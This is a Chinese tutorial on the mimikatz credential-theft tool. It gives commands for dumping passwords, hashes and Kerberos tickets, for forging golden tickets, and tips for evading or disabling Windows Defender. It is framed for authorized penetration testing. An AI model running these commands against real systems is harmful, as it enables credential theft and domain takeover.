mimikatz使用教程

mimikatz 是一款功能强大的 Windows 平台安全工具主要用于从内存中提取密码、哈希、票据等敏感凭据信息。它最初由法国安全研究员 Benjamin Delpy 开发因能够直接获取明文密码而在渗透测试和安全审计领域广为人知。该工具利用 Windows 系统的安全机制缺陷在获得管理员权限后可以访问内存中的认证信息支持提取多种类型的凭据如 LM/NTLM 哈希、Kerberos 票据、PIN 码等还具备票据伪造、权限提升等高级功能是攻防演练和系统安全评估中的重要工具。二、工具文件结构文件/目录路径说明/usr/share/windows-resources/mimikatzmimikatz 工具的主目录kiwi_passwords.yarYARA 规则文件用于检测与密码相关的敏感信息mimicom.idl接口定义文件用于组件对象模型COM接口的定义Win32/32位 Windows 系统的可执行文件和组件目录Win32/mimidrv.sys32位版本的驱动程序文件用于底层系统交互Win32/mimikatz.exe32位版本的 mimikatz 主程序Win32/mimilib.dll32位版本的辅助动态链接库Win32/mimilove.exe32位版本的辅助程序用于特定场景下的凭据提取Win32/mimispool.dll32位版本的打印池相关组件用于特定攻击场景x64/64位 Windows 系统的可执行文件和组件目录x64/mimidrv.sys64位版本的驱动程序文件x64/mimikatz.exe64位版本的 mimikatz 主程序x64/mimilib.dll64位版本的辅助动态链接库x64/mimispool.dll64位版本的打印池相关组件三、使用教程1. 前提条件运行环境需在 Windows 系统中运行可通过 Wine 在 Linux 中模拟但推荐原生 Windows 环境权限要求必须以管理员权限运行右键”以管理员身份运行”部分功能需要 SYSTEM 权限系统限制部分 Windows 版本如 Win10/Win11 或 Server 2016可能因 Defender 或系统防护机制拦截需先关闭相关防护2. 基础操作命令1启动 mimikatz# 64位系统 x64\mimikatz.exe # 32位系统 Win32\mimikatz.exe启动后会进入 mimikatz 交互界面提示符为mimikatz #2查看帮助信息mimikatz # help mimikatz # sekurlsa::help # 查看特定模块帮助3. 核心功能使用示例1提取明文密码和哈希最常用功能# 提升权限至 SYSTEM部分系统需要 mimikatz # privilege::debug Privilege 20 OK # 提取所有可用凭据 mimikatz # sekurlsa::logonpasswords输出内容包括登录会话信息用户、域、登录类型LM 哈希和 NTLM 哈希明文密码若系统配置允许存储Kerberos 票据信息2提取本地用户哈希类似 pwdumpmimikatz # lsadump::sam从 SAM 数据库中提取本地用户的哈希值无需访问注册表文件3提取域相关凭据针对域环境# 提取域控制器中的域哈希 mimikatz # lsadump::lsa /patch # 提取域内用户的 Kerberos 票据 mimikatz # sekurlsa::tickets /export4票据操作黄金票据/白银票据# 列出当前缓存的票据 mimikatz # kerberos::list # 清除当前票据 mimikatz # kerberos::purge # 注入黄金票据需要域管理员权限相关信息 mimikatz # kerberos::golden /user:管理员用户名 /domain:域名 /sid:域SID /krbtgt:krbtgt哈希 /ptt5权限提升辅助# 启用调试权限 mimikatz # privilege::debug # 查看系统进程中的令牌 mimikatz # token::elevate4. 使用注意事项防御规避现代 Windows 系统对 mimikatz 检测严格可通过以下方式提高成功率使用免杀版本如 Kiwi 模块集成在 Meterpreter 中关闭 Windows Defender 实时保护以 SYSTEM 权限运行通过 psexec -s 等方式法律风险仅在合法授权的渗透测试中使用未经授权提取他人凭据可能触犯法律版本选择根据目标系统位数选择 x64 或 Win32 版本否则可能导致功能异常